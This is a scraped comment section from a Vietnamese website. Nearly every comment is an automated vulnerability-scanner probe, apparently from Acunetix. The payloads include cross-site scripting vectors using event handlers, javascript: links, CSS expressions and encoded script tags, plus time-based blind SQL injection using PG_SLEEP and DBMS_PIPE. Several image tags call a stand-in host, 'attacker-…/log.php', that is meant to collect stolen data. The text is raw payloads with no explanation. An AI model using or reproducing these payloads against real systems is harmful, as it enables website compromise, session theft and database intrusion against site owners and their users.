e<isindex type=image src=1 onerror=bBdd(9902)> 20:06 27/09/2023 - Reply

@qeNtfPNC:

e<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9544'> 20:06 27/09/2023 - Reply

@qeNtfPNC:

T2n5uILA')) OR 968=(SELECT 968 FROM PG_SLEEP(15))-- 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

@qeNtfPNC: <input autofocus onfocus=QT9c(9578)>

e<body onload=bBdd(9430)> 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

<a HrEF=http://xss.bxss.me></a>

e<img src=//xss.bxss.me/t/dot.gif onload=bBdd(9318)> 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

<a HrEF=jaVaScRiPT:>

e<img src=xyz OnErRor=bBdd(9611)> 20:06 27/09/2023 - Reply

@qeNtfPNC:

e<img/src=">" onerror=alert(9912)> 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

@qeNtfPNC: }body{zzz:Expre/**/SSion(QT9c(9733))}

%65%3C%53%63%52%69%50%74%20%3E%62%42%64%64%289401%29%3C%2F%73%43%72%69%70%54%3E 20:06 27/09/2023 - Reply

@qeNtfPNC:

e'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

@qeNtfPNC: Gu6Fh <br />

1'" 20:06 27/09/2023 - Reply

@qeNtfPNC:

@@UpQuG 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

@qeNtfPNC: <W6QX2C>FGKR7[!+!]</W6QX2C>

e\u003CScRiPt\bBdd(9089)\u003C/sCripT\u003E 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

@qeNtfPNC: <ifRAme sRc=9509.com></IfRamE>

e&lt;ScRiPt&gt;bBdd(9045)&lt;/sCripT&gt; 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

@qeNtfPNC: <a20YgdC x=9456>

e 20:06 27/09/2023 - Reply

@qeNtfPNC: <img sRc='http://attacker-9316/log.php?

e<input autofocus onfocus=bBdd(9982)> 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

@qeNtfPNC: <aKXrOib<

<a HrEF=http://xss.bxss.me></a> 20:06 27/09/2023 - Reply

@qeNtfPNC:

<a HrEF=jaVaScRiPT:> 20:06 27/09/2023 - Reply

@qeNtfPNC:

e}body{zzz:Expre/**/SSion(bBdd(9084))} 20:06 27/09/2023 - Reply

@qeNtfPNC:

eTKgPf <br /> 20:06 27/09/2023 - Reply

@qeNtfPNC:

e<WX0DBV>LTOK6[!+!]</WX0DBV> 20:06 27/09/2023 - Reply

@qeNtfPNC:

e<ifRAme sRc=9145.com></IfRamE> 20:07 27/09/2023 - Reply

@qeNtfPNC:

e 20:07 27/09/2023 - Reply

@qeNtfPNC:

e\u0022onmouseover=bBdd(92813)\u0022 20:07 27/09/2023 - Reply

@qeNtfPNC:

%65%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%62%42%64%64%28%39%34%30%32%34%29%22 20:07 27/09/2023 - Reply

@qeNtfPNC:

e 20:07 27/09/2023 - Reply

@qeNtfPNC:

e"sTYLe='zzz:Expre/**/SSion(bBdd(9000))'bad=" 20:07 27/09/2023 - Reply

@qeNtfPNC:

e 20:07 27/09/2023 - Reply

@qeNtfPNC:

e"><br /> 20:07 27/09/2023 - Reply

@qeNtfPNC:

e 20:07 27/09/2023 - Reply

@qeNtfPNC:

e 20:07 27/09/2023 - Reply

@qeNtfPNC:

e 20:07 27/09/2023 - Reply

@qeNtfPNC:

e 20:07 27/09/2023 - Reply

@qeNtfPNC:

e 20:07 27/09/2023 - Reply

@qeNtfPNC:

e 20:07 27/09/2023 - Reply

@qeNtfPNC:

e 20:07 27/09/2023 - Reply

@qeNtfPNC:

e 20:07 27/09/2023 - Reply

@qeNtfPNC:

e9955343 20:19 27/09/2023 - Reply

@qeNtfPNC:

e 20:19 27/09/2023 - Reply

@qeNtfPNC: 9482123

bfg1911%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl1911 20:19 27/09/2023 - Reply

@qeNtfPNC:

e 20:19 27/09/2023 - Reply

bfg7244%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl7244

bfgx2066%C0%BEz1%C0%BCz2a%90bcxhjl2066 20:19 27/09/2023 - Reply

@qeNtfPNC:

e 20:19 27/09/2023 - Reply

bfgx6630%C0%BEz1%C0%BCz2a%90bcxhjl6630

bfg5475%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5475 20:19 27/09/2023 - Reply

@qeNtfPNC:

bfgx1864%C0%BEz1%C0%BCz2a%90bcxhjl1864 20:19 27/09/2023 - Reply

@qeNtfPNC:

e 20:20 27/09/2023 - Reply

@qeNtfPNC: <WRAVYQ>4IY5F[!+!]</WRAVYQ>

e 20:20 27/09/2023 - Reply

@qeNtfPNC: %3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%66%58%59%4A%28%39%30%35%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

e 20:20 27/09/2023 - Reply

@qeNtfPNC: <ScRiPt >fXYJ(9423)</ScRiPt>

e 20:20 27/09/2023 - Reply

@qeNtfPNC: <isindex type=image src=1 onerror=fXYJ(9566)>

e 20:20 27/09/2023 - Reply

@qeNtfPNC: <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9014'>

e 20:20 27/09/2023 - Reply

@qeNtfPNC: <body onload=fXYJ(9767)>

e<WT4QIG>YSMGR[!+!]</WT4QIG> 20:20 27/09/2023 - Reply

@qeNtfPNC:

e 20:20 27/09/2023 - Reply

@qeNtfPNC: <img src=//xss.bxss.me/t/dot.gif onload=fXYJ(9595)>

e 20:20 27/09/2023 - Reply

@qeNtfPNC: <img src=xyz OnErRor=fXYJ(9710)>

e%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%49%62%49%41%28%39%32%37%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 20:20 27/09/2023 - Reply

@qeNtfPNC:

e 20:20 27/09/2023 - Reply

@qeNtfPNC: <img/src=">" onerror=alert(9152)>

e<ScRiPt >IbIA(9919)</ScRiPt> 20:20 27/09/2023 - Reply

@qeNtfPNC:

e 20:20 27/09/2023 - Reply

%40%71%65%4E%74%66%50%4E%43%3A%20%3C%53%63%52%69%50%74%20%3E%66%58%59%4A%289857%29%3C%2F%73%43%72%69%70%54%3E

e<isindex type=image src=1 onerror=IbIA(9211)> 20:20 27/09/2023 - Reply

@qeNtfPNC:

e 20:20 27/09/2023 - Reply

@qeNtfPNC: \u003CScRiPt\fXYJ(9150)\u003C/sCripT\u003E

e<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9459'> 20:21 27/09/2023 - Reply

@qeNtfPNC:

e 20:21 27/09/2023 - Reply

@qeNtfPNC: &lt;ScRiPt&gt;fXYJ(9379)&lt;/sCripT&gt;

e<body onload=IbIA(9442)> 20:21 27/09/2023 - Reply

@qeNtfPNC:

e<img src=//xss.bxss.me/t/dot.gif onload=IbIA(9772)> 20:21 27/09/2023 - Reply

@qeNtfPNC:

e 20:21 27/09/2023 - Reply

@qeNtfPNC: <input autofocus onfocus=fXYJ(9984)>

e<img src=xyz OnErRor=IbIA(9011)> 20:21 27/09/2023 - Reply

@qeNtfPNC:

e<img/src=">" onerror=alert(9989)> 20:21 27/09/2023 - Reply

@qeNtfPNC:

%65%3C%53%63%52%69%50%74%20%3E%49%62%49%41%289876%29%3C%2F%73%43%72%69%70%54%3E 20:21 27/09/2023 - Reply

@qeNtfPNC:

e 20:21 27/09/2023 - Reply

@qeNtfPNC: }body{zzz:Expre/**/SSion(fXYJ(9670))}

e 20:21 27/09/2023 - Reply

@qeNtfPNC: 2NF6p <br />

e\u003CScRiPt\IbIA(9126)\u003C/sCripT\u003E 20:21 27/09/2023 - Reply

@qeNtfPNC:

e&lt;ScRiPt&gt;IbIA(9402)&lt;/sCripT&gt; 20:21 27/09/2023 - Reply

@qeNtfPNC:

e 20:21 27/09/2023 - Reply

@qeNtfPNC: <WIUFI5>D5KUE[!+!]</WIUFI5>

e<input autofocus onfocus=IbIA(9128)> 20:21 27/09/2023 - Reply

@qeNtfPNC:

e 20:21 27/09/2023 - Reply

@qeNtfPNC: <ifRAme sRc=9173.com></IfRamE>

e 20:21 27/09/2023 - Reply

@qeNtfPNC: <aLfVUY7 x=9751>

e}body{zzz:Expre/**/SSion(IbIA(9236))} 20:21 27/09/2023 - Reply

@qeNtfPNC:

e 20:21 27/09/2023 - Reply

@qeNtfPNC: <img sRc='http://attacker-9777/log.php?

eXG0Cv <br /> 20:21 27/09/2023 - Reply

@qeNtfPNC:

e 20:21 27/09/2023 - Reply

@qeNtfPNC: <a4GdOmb<

e<WYKHL0>EY4FN[!+!]</WYKHL0> 20:21 27/09/2023 - Reply

@qeNtfPNC:

e<ifRAme sRc=9942.com></IfRamE> 20:21 27/09/2023 - Reply

@qeNtfPNC:

e<aZM0keT x=9547> 20:21 27/09/2023 - Reply

@qeNtfPNC:

e<img sRc='http://attacker-9303/log.php? 20:21 27/09/2023 - Reply

@qeNtfPNC:

e<aYRwuc2< 20:21 27/09/2023 - Reply

@qeNtfPNC:

e%22onmouseover=IbIA(93532)%22 20:21 27/09/2023 - Reply

@qeNtfPNC:

e"onmouseover=IbIA(98452)" 20:22 27/09/2023 - Reply

@qeNtfPNC:

e" RG0o=IbIA([!+!]) 6Qv=" 20:22 27/09/2023 - Reply

@qeNtfPNC:

e\u0022onmouseover=IbIA(96853)\u0022 20:22 27/09/2023 - Reply

@qeNtfPNC:

%65%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%49%62%49%41%28%39%39%31%38%34%29%22 20:22 27/09/2023 - Reply

@qeNtfPNC:

e"sTYLe='zzz:Expre/**/SSion(IbIA(9558))'bad=" 20:22 27/09/2023 - Reply

@qeNtfPNC:

e 00:03 28/09/2023 - Reply

@qeNtfPNC: 9967346

e9267058 00:03 28/09/2023 - Reply

@qeNtfPNC:

bfg9173%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9173 00:03 28/09/2023 - Reply

@qeNtfPNC:

e 00:03 28/09/2023 - Reply

bfg8241%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl8241

bfgx2782%C0%BEz1%C0%BCz2a%90bcxhjl2782 00:03 28/09/2023 - Reply

@qeNtfPNC:

e 00:03 28/09/2023 - Reply

bfgx3102%C0%BEz1%C0%BCz2a%90bcxhjl3102

bfg9399%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9399 00:03 28/09/2023 - Reply

@qeNtfPNC:

Để lại bình luận

img

Đăng ký nhận bản tin